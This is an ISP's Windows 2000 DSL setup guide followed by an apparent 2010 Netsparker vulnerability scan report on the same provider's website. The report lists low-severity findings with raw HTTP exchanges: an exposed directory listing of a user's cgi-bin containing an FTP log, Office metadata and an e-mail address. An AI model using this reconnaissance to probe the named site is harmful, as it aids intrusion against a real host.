<html><body><h3>Setting up your Windows 2000</h3>First Make sure that all computers have an Ethernet card installed, as well as being properly connected to the router or hub (hubs are onlyneeded if you have more that 4 workstations that need to be hooked up tothe connection) with a RJ-45 Ethernet Cable. Both are available at anycomputer or technology store.<p>Below is a list of IP�s that Galaxy has allocated for the workstations onyour LAN. (Local Area Network.) We will inform you the IP of the routeritself; then you need to assign the addresses, one for each PC in your LAN.We will also provide you with a Subnet mask value for your network.(Usually 255.255.255.248)<p>You�ll also choose a unique hostname for each PC. You will set a domainname for your LAN, which can be an �officially� registered name likeYahoo.com or just a local name that you�ve picked like �mycompany.�<p>All the information you will need to set up your GalaxyDSL account.<p>Account Name: [Account Name]<p>IP Addresses: 192.168.100.2 through .255<p>Subnet Mask: 255.255.255.0<p>Default Gateway: 192.168.100.1<p>DNS Servers: 208.218.130.4 and 208.218.130.5<p><p>If you are not running your own mail server, and rely on Galaxy for emailservices, use this information:<p>Incoming Mail Server: pop.gis.net<p>Outgoing Mail Server: smtp.gis.net<p>So lets get started!<p> 1. Close all Programs on your computer, save all information.<p> 2. Click on the Start button in the lower left hand corner of the screen.<p> 3. Choose Settings<p> 4. Chose Network and Dial Up Connections<p><img src="1.png"><p> 5. Double Click on Make New Connection.<p><img src="2.png"><p> 6. The Connection Wizard should start. Click Next.<p><img src="3.png"><p> 7. Next, you need to choose your connection type. Just choose Dial-up to the Internet. Click Next.<p><img src="4.png"><p> 8. The Internet Connection Wizard screen should appear. Select the third choice I want to set up my Internet Connection Manually, or I want to connect through a local area network [LAN]. Then Click Next.<p><img src="5.png"><p> 9. Choose I connect through a Local Area Network [LAN]. Then click Next.<p><img src="6.png"><p>10. Click Next.<p><img src="7.png"><p>11.The wizard should be complete now. Uncheck the check box and then hitFinish<p><img src="8.png"><p> 12. When you reopen Network and Dial-up Connections, you should now see and Icon labeled Local Area Connection. Right Click on the Icon and select Properties.<p><img src="9.png"><p> 13. Click on TCP/IP and then hit Properties.<p> 14. Enter the following numbers in the Use the following IP Address: 192.168.100.2, and with a Subnet Mask of 255.255.255.0. The Default Gateway should be 192.168.100.1<p><img src="10.png"><p> 15. Enter the following number in the same Use the following DNS server addresses: 208.218.130.4, 208.218.130.5<p> 16. Click the OK button at the bottom of the window.<p> 17. Click OK again.<p> 18. You should be all set. To make sure the connection starts properly, please Restart your computer now.<p>You can test your GalaxyDSL connection by running a web browser andvisiting various Web sites.<p>To test if your computer is properly communicating with your GalaxyDSLrouter, you can run the ping command from a DOS window, specifying yourrouter�s IP address (same as your default gateway) as an argument to ping.<p><img src="11.png"><p>If your computer still attempts to connect to the Internet via the phoneline after finishing this setup, follow these simple steps.<p> 1. Click on the Start button in the lower left hand corner of the screen.<p> 2. Choose Settings<p>3. Chose Control Panel<p> 4. Chose Internet Options<p><img src="12.png"><p>5. You will see the General tab in front of you. Chose Connections.<p>6. Make sure that Never dial a connection is selected.<p>7. Click on LAN Settings<p> 8. Make sure Automatically Detect Settings is selected.<p><img src="13.png"><p> 9. Click on OK<p> 10. Click on OK again.<p>All set!</body></html>

Forbidden Resource

1 TOTAL

INFORMATION

CONFIRMED

Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.

- /support/

/support/ CONFIRMED

http://www.gis.net/support/

Request

GET /support/ HTTP/1.1
Referer: http://www.gis.net/support/dialup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Date: Sat, 25 Sep 2010 00:54:12 GMT
Server: Apache
Content-Length: 220
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /support/index.htmlon this server.</p></body></html>

Directory Listing (Apache)

1 TOTAL

INFORMATION

The web server responded with a list of files located in the target directory.

Impact

An attacker can see the files located in the directory and could potentially access files which disclose sensitive information.

Actions to Take

See the remedy for solution.
Configure the web server to disallow directory listing requests.
This can also be caused the web server products that don't have latest security patches. Ensure that all of the patches have been applied.

Remedy

Change your httpd.conf file. A secure configuration for the requested directory should be similar to the following one:

<Directory /{YOUR DIRECTORY}>
	Options FollowSymLinks 
</Directory>

Remove the Indexes option from configuration. Do not forget to remove MultiViews as well.

External References

- /~sotis/cgi-bin/

/~sotis/cgi-bin/

http://www.gis.net/~sotis/cgi-bin/

Request

GET /~sotis/cgi-bin/ HTTP/1.1
Referer: http://www.gis.net/~sotis/cgi-bin/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 25 Sep 2010 00:54:42 GMT
Server: Apache
Content-Length: 1117
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html> <head> <title>Index of /~sotis/cgi-bin</title> </head> <body><h1>Index of /~sotis/cgi-bin</h1><pre><img src="/icons/blank.gif" alt="Icon "> <a href="?C=N;O=D">Name</a> <a href="?C=M;O=A">Last modified</a> <a href="?C=S;O=A">Size</a> <a href="?C=D;O=A">Description</a><hr><img src="/icons/back.gif" alt="[DIR]"> <a href="/~sotis/">Parent Directory</a> - <img src="/icons/unknown.gif" alt="[ ]"> <a href="crazyadmin.cgi">crazyadmin.cgi</a> 02-Nov-1999 15:55 118K <img src="/icons/script.gif" alt="[ ]"> <a href="crazyadmin.conf">crazyadmin.conf</a> 02-Nov-1999 15:55 13 <img src="/icons/unknown.gif" alt="[ ]"> <a href="crazywwwboard.cgi">crazywwwboard.cgi</a> 02-Nov-1999 15:55 202K <img src="/icons/script.gif" alt="[ ]"> <a href="crazywwwboard.conf">crazywwwboard.conf</a> 02-Nov-1999 15:55 26K <img src="/icons/unknown.gif" alt="[ ]"> <a href="ws_ftp.log">ws_ftp.log</a> 02-Nov-1999 15:55 3.9K <hr></pre></body></html>

MS Office Information Disclosure

2 TOTAL

INFORMATION

Netsparker found HTML files that are produced by MS Office Suite. MS Office has appended user related information to the document.

Impact

This information can be used for social engineering attacks.

Remedy

Remove all sensitive information from your HTML documents.

- /support/windows/win2000/index.html

/support/windows/win2000/index.html

http://www.gis.net/support/windows/win2000/index.html

Request

GET /support/windows/win2000/index.html HTTP/1.1
Referer: http://www.gis.net/support/windows/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 25 Sep 2010 00:54:33 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 21995
Content-Type: text/html

<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns="http://www.w3.org/TR/REC-html40"><head><meta http-equiv=Content-Type content="text/html; charset=windows-1252"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 9"><meta name=Originator content="Microsoft Word 9"><link rel=File-List href="./win2000_files/filelist.xml"><title> </title><style></style></head><body lang=EN-US style='tab-interval:.5in'><div class=Section1><h2><span style="mso-spacerun: yes">�� </span><![if !vml]><img width=117 height=85src="./win2000_files/image001.gif" v:shapes="_x0000_i1097"><![endif]></h2><h2><span style="mso-spacerun: yes">�� </span>Windows <spanstyle='color:red'>2000</span> Setup</h2><p class=MsoNormal><![if !supportEmptyParas]> <![endif]><o:p></o:p></p><p class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto;margin-left:.5in;text-indent:-.25in;mso-list:l0 level1 lfo1'><![if !supportLists]><spanstyle='font-size:10.0pt;font-family:Arial'>1.<span style='font:7.0pt "Times New Roman"'>      </span></span><![endif]><span style='font-size:10.0pt;font-family:Arial'>Clickthe <b>Start</b> button, click <b>Settings</b>, and choose <b>Control Panel</b>.<o:p></o:p></span></p><p style='margin-left:.5in'><span style='font-size:10.0pt;font-family:Arial'><![if !vml]><img width=386 height=304src="./win2000_files/image002.gif" v:shapes="_x0000_i1061"><![endif]><o:p></o:p></span></p><ol start=2 type=1> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Double-click the <b>Network and Dial-up Connections</b> icon. <o:p></o:p></span></li></ol><p style='margin-left:.5in'><span style='font-size:10.0pt;font-family:Arial'><![if !vml]><img width=344 height=315src="./win2000_files/image003.gif" v:shapes="_x0000_i1062"><![endif]><o:p></o:p></span></p><ol start=3 type=1> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Double-click the <b>Make New Connection</b> icon. <o:p></o:p></span></li></ol><p style='margin-left:.5in'><span style='font-size:10.0pt;font-family:Arial'><![if !vml]><img width=344 height=315src="./win2000_files/image004.gif" v:shapes="_x0000_i1063"><![endif]><o:p></o:p></span></p><ol start=4 type=1> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Click the <b>Next</b> button. <o:p></o:p></span></li></ol><p style='margin-left:.5in'><span style='font-size:10.0pt;font-family:Arial'><![if !vml]><img width=503 height=385src="./win2000_files/image005.gif" v:shapes="_x0000_i1064"><![endif]><o:p></o:p></span></p><ol start=5 type=1> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Select <b>Dial-up to the Internet</b>. <o:p></o:p></span></li> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Click the <b>Next</b> button. <o:p></o:p></span></li></ol><p style='margin-left:.5in'><span style='font-size:10.0pt;font-family:Arial'><![if !vml]><img width=503 height=385src="./win2000_files/image006.gif" v:shapes="_x0000_i1065"><![endif]><o:p></o:p></span></p><ol start=7 type=1> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Select <b>I want to set up my Internet connection manually.</b><o:p></o:p></span></li> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Click the <b>Next</b> button. <o:p></o:p></span></li></ol><p style='margin-left:.5in'><span style='font-size:10.0pt;font-family:Arial'><![if !vml]><img width=542 height=441src="./win2000_files/image007.gif" v:shapes="_x0000_i1066"><![endif]><o:p></o:p></span></p><ol start=9 type=1> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Select <b>I connect through a phone line and a modem</b>. <o:p></o:p></span></li> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Click the <b>Next</b> button. <o:p></o:p></span></li></ol><p style='margin-left:.5in'><span style='font-size:10.0pt;font-family:Arial'><![if !vml]><img width=542 height=441src="./win2000_files/image008.gif" v:shapes="_x0000_i1067"><![endif]><o:p></o:p></span></p><ol start=11 type=1> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>In the <b>Area Code</b> field, type the area code of your local access number. <o:p></o:p></span></li> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'>In the <b>Telephone number</b> field, type your local access number. </li> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Click the <b>Next</b> button. <o:p></o:p></span></li></ol><p style='margin-left:.5in'><![if !vml]><img width=542 height=441src="./win2000_files/image009.gif" v:shapes="_x0000_i1083"><![endif]><spanstyle='font-size:10.0pt;font-family:Arial'><o:p></o:p></span></p><ol start=14 type=1> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>In the <b>User name</b> field, type your Galaxy username. Be sure to use all lower case letters. <o:p></o:p></span></li> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>In the <b>Password</b> field, type your Galaxy password. <o:p></o:p></span></li> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Click the <b>Next</b> button. <o:p></o:p></span></li></ol><p style='margin-left:.5in'><span style='font-size:10.0pt;font-family:Arial'><![if !vml]><img width=542 height=441src="./win2000_files/image010.gif" v:shapes="_x0000_i1085"><![endif]><o:p></o:p></span></p><ol start=17 type=1> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>In the <b>Connection Name</b> field, type </span><b><span style='font-size:10.0pt;font-family:"Courier New"'>Galaxy</span></b><span style='font-size:10.0pt;font-family:Arial'> <o:p></o:p></span></li> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Click the <b>Next</b> button. <o:p></o:p></span></li></ol><p style='margin-left:.5in'><span style='font-size:10.0pt;font-family:Arial'><![if !vml]><img width=542 height=441src="./win2000_files/image011.gif" v:shapes="_x0000_i1087"><![endif]><o:p></o:p></span></p><ol start=19 type=1> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Click the <b>Yes</b> radio button in the <b>Do you want to set up an Internet mail account now</b> area. <o:p></o:p></span></li> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Click the <b>Next</b> button. <o:p></o:p></span></li></ol><p style='margin-left:.5in'><span style='font-size:10.0pt;font-family:Arial'><![if !vml]><img width=542 height=441src="./win2000_files/image012.gif" v:shapes="_x0000_i1073"><![endif]><o:p></o:p></span></p><ol start=21 type=1> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>In the <b>Display Name</b> field, type ..

- /support/windows/win2000/

/support/windows/win2000/

http://www.gis.net/support/windows/win2000/

Request

GET /support/windows/win2000/ HTTP/1.1
Referer: http://www.gis.net/support/windows/win2000
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 25 Sep 2010 00:54:35 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 21995
Content-Type: text/html

<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns="http://www.w3.org/TR/REC-html40"><head><meta http-equiv=Content-Type content="text/html; charset=windows-1252"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 9"><meta name=Originator content="Microsoft Word 9"><link rel=File-List href="./win2000_files/filelist.xml"><title> </title><style></style></head><body lang=EN-US style='tab-interval:.5in'><div class=Section1><h2><span style="mso-spacerun: yes">�� </span><![if !vml]><img width=117 height=85src="./win2000_files/image001.gif" v:shapes="_x0000_i1097"><![endif]></h2><h2><span style="mso-spacerun: yes">�� </span>Windows <spanstyle='color:red'>2000</span> Setup</h2><p class=MsoNormal><![if !supportEmptyParas]> <![endif]><o:p></o:p></p><p class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto;margin-left:.5in;text-indent:-.25in;mso-list:l0 level1 lfo1'><![if !supportLists]><spanstyle='font-size:10.0pt;font-family:Arial'>1.<span style='font:7.0pt "Times New Roman"'>      </span></span><![endif]><span style='font-size:10.0pt;font-family:Arial'>Clickthe <b>Start</b> button, click <b>Settings</b>, and choose <b>Control Panel</b>.<o:p></o:p></span></p><p style='margin-left:.5in'><span style='font-size:10.0pt;font-family:Arial'><![if !vml]><img width=386 height=304src="./win2000_files/image002.gif" v:shapes="_x0000_i1061"><![endif]><o:p></o:p></span></p><ol start=2 type=1> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Double-click the <b>Network and Dial-up Connections</b> icon. <o:p></o:p></span></li></ol><p style='margin-left:.5in'><span style='font-size:10.0pt;font-family:Arial'><![if !vml]><img width=344 height=315src="./win2000_files/image003.gif" v:shapes="_x0000_i1062"><![endif]><o:p></o:p></span></p><ol start=3 type=1> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Double-click the <b>Make New Connection</b> icon. <o:p></o:p></span></li></ol><p style='margin-left:.5in'><span style='font-size:10.0pt;font-family:Arial'><![if !vml]><img width=344 height=315src="./win2000_files/image004.gif" v:shapes="_x0000_i1063"><![endif]><o:p></o:p></span></p><ol start=4 type=1> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Click the <b>Next</b> button. <o:p></o:p></span></li></ol><p style='margin-left:.5in'><span style='font-size:10.0pt;font-family:Arial'><![if !vml]><img width=503 height=385src="./win2000_files/image005.gif" v:shapes="_x0000_i1064"><![endif]><o:p></o:p></span></p><ol start=5 type=1> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Select <b>Dial-up to the Internet</b>. <o:p></o:p></span></li> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Click the <b>Next</b> button. <o:p></o:p></span></li></ol><p style='margin-left:.5in'><span style='font-size:10.0pt;font-family:Arial'><![if !vml]><img width=503 height=385src="./win2000_files/image006.gif" v:shapes="_x0000_i1065"><![endif]><o:p></o:p></span></p><ol start=7 type=1> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Select <b>I want to set up my Internet connection manually.</b><o:p></o:p></span></li> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Click the <b>Next</b> button. <o:p></o:p></span></li></ol><p style='margin-left:.5in'><span style='font-size:10.0pt;font-family:Arial'><![if !vml]><img width=542 height=441src="./win2000_files/image007.gif" v:shapes="_x0000_i1066"><![endif]><o:p></o:p></span></p><ol start=9 type=1> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Select <b>I connect through a phone line and a modem</b>. <o:p></o:p></span></li> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Click the <b>Next</b> button. <o:p></o:p></span></li></ol><p style='margin-left:.5in'><span style='font-size:10.0pt;font-family:Arial'><![if !vml]><img width=542 height=441src="./win2000_files/image008.gif" v:shapes="_x0000_i1067"><![endif]><o:p></o:p></span></p><ol start=11 type=1> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>In the <b>Area Code</b> field, type the area code of your local access number. <o:p></o:p></span></li> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'>In the <b>Telephone number</b> field, type your local access number. </li> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Click the <b>Next</b> button. <o:p></o:p></span></li></ol><p style='margin-left:.5in'><![if !vml]><img width=542 height=441src="./win2000_files/image009.gif" v:shapes="_x0000_i1083"><![endif]><spanstyle='font-size:10.0pt;font-family:Arial'><o:p></o:p></span></p><ol start=14 type=1> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>In the <b>User name</b> field, type your Galaxy username. Be sure to use all lower case letters. <o:p></o:p></span></li> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>In the <b>Password</b> field, type your Galaxy password. <o:p></o:p></span></li> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Click the <b>Next</b> button. <o:p></o:p></span></li></ol><p style='margin-left:.5in'><span style='font-size:10.0pt;font-family:Arial'><![if !vml]><img width=542 height=441src="./win2000_files/image010.gif" v:shapes="_x0000_i1085"><![endif]><o:p></o:p></span></p><ol start=17 type=1> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>In the <b>Connection Name</b> field, type </span><b><span style='font-size:10.0pt;font-family:"Courier New"'>Galaxy</span></b><span style='font-size:10.0pt;font-family:Arial'> <o:p></o:p></span></li> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Click the <b>Next</b> button. <o:p></o:p></span></li></ol><p style='margin-left:.5in'><span style='font-size:10.0pt;font-family:Arial'><![if !vml]><img width=542 height=441src="./win2000_files/image011.gif" v:shapes="_x0000_i1087"><![endif]><o:p></o:p></span></p><ol start=19 type=1> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Click the <b>Yes</b> radio button in the <b>Do you want to set up an Internet mail account now</b> area. <o:p></o:p></span></li> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Click the <b>Next</b> button. <o:p></o:p></span></li></ol><p style='margin-left:.5in'><span style='font-size:10.0pt;font-family:Arial'><![if !vml]><img width=542 height=441src="./win2000_files/image012.gif" v:shapes="_x0000_i1073"><![endif]><o:p></o:p></span></p><ol start=21 type=1> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>In the <b>Display Name</b> field, type ..

E-mail Address Disclosure

1 TOTAL

INFORMATION

Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

Wikipedia - E-Mail Spam

- /bizdsl.html

/bizdsl.html

http://www.gis.net/bizdsl.html

Found E-mails

email@yourname.com

Request

GET /bizdsl.html HTTP/1.1
Referer: http://www.gis.net/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 25 Sep 2010 00:54:07 GMT
Server: Apache
Accept-Ranges: bytes
Transfer-Encoding: chunked
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>Galaxy Internet Services: Business DSL Internet Access</title> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="Content-Style-Type" content="text/css" /> <link href="galaxy.css" type="text/css" rel="stylesheet" /> <link rel="shortcut icon" type="image/ico" href="favicon.ico" /> <script type="text/javascript"><![CDATA[//><!]]></script></head><body><div id="middle"> <div id="header"> <div id="logo"> <div style="width: 190px; float: left;"> <a href="index.html"><img src="./images/galaxylogo.gif" style="border: 0px;" alt="Galaxy Internet Services" /></a> </div> </div> <div id="navigation"> <ul id="nav"> <li><a href="#">Residential</a> <ul> <li><a href="dialup.html">Dialup</a></li> <li><a href="resdsl.html">DSL</a></li> <li><a href="http://www.galaxysavesmoney.com/tripleplay_gisnet.html">Triple Play</a></li> <li><a href="wifi.html">Wi-Fi</a></li> <li><a href="resphone.html">Broadband Phone</a></li> </ul> </li> <li><a href="#">Business</a> <ul> <li><a href="dialup.html">Dialup</a></li> <li><a href="bizdsl.html">DSL</a></li> <li><a href="leasedlines.html">Leased Lines</a></li> <li><a href="isdn.html">ISDN</a></li>  <li><a href="wifi.html">Wi-Fi</a></li> <li><a href="wireless.html">Fixed Wireless</a></li>  <li><a href="bizphone.html">Broadband Phone</a></li> <li><a href="websitehosting.html">Website Hosting</a></li> <li><a href="colo.html">Colocation</a></li> </ul> </li> <li><a href="#">Support</a> <ul> <li><a href="support/dialup.html">Dialup</a></li> <li><a href="support/dsl.html">DSL</a></li> <li><a href="support/email.html">Email</a></li> <li><a href="support/phone.html">Broadband Phone</a></li> <li><a href="support/webhosting.html">Website Hosting</a></li> <li><a href="http://cp.gis.net">Control Panel</a></li> <li><a href="support/downloads.html">Downloads</a></li> </ul> </li> <li><a href="#">About</a> <ul> <li><a href="network.html">Our Network</a></li> <li><a href="jobs.html">Jobs</a></li> <li><a href="press.html">Press</a></li> </ul> </li> </ul> </div> </div> <div id="contentbox"> <div id="servicetext"> <div style="padding: 15px;"> <h2>Standard Business DSL</h2> <p> Speed up your internet connection with DSL! Digital Subscriber Line, a proven technology that uses existing copper wires to provide you with dedicated, fast internet access. Because it's digital, not analog, you can enjoy 2X T-1 like speeds up to 50 times faster than your current modem. </p> <b>Our Business DSL features:</b> <ul> <li>Free Activation</li> <li>Free DSL Modem*</li> <li>Unlimited, Always-On High Speed Internet Service</li> <li>4X T1 Download Speeds of Up to 7.1Mbps</li> <li>Free Domain Hosting Services</li> <ul> <li>Have your own website address, www.yourname.com</li> <li>Get email@yourname.com</li> <li>We support all top level domains, .com, .org, .net, .name, .us, etc.</li> </ul> <li>10 Email Boxes</li> <li>50 MB of Web Space</li> <li>Dial-Up Account with 20 Free Hours - for Travel or Backup</li> <li>Free Pop-Up Blocker Professional</li> <li>SPAM Filtering</li> <li>Unlimited, Free Technical Support</li> </ul> <p style="text-align: center;"> Available in Massachusetts, New Hampshire, New York, & Rhode Island </p><p> <table class="servicetable"> <tr class="hrow"><td>Speed</td><td>Email</td><td>Web Hosting</td><td>Starting At</td><td>Setup Fee</td></tr> <tr class="irow"><td>Up to 1.0Mbps</td><td>10 Addresses</td><td>50 Megabytes</td><td>$34.95</td><td>24.95</td></tr> <tr class="irow"><td>Up to 3.0Mbps</td><td>10 Addresses</td><td>50 Megabytes</td><td>$69.95</td><td>24.95</td></tr> <tr class="irow"><td>Up to 5.0Mbps</td><td>10 Addresses</td><td>50 Megabytes</td><td>$82.95</td><td>24.95</td></tr> <tr class="irow"><td>Up to 7.1Mbps</td><td>10 Addresses</td><td>50 Megabytes</td><td>$90.95</td><td>24.95</td></tr> </table> <p style="font-size: 8pt;"> * $14.95 Shipping and Handling Fee. Additional charges, taxes and terms apply.</p><p style="font-weight: bold;">Call for more information, or <a href="https://secure.gis.net/dslcombo_business.html">Signup Online</a> for Business 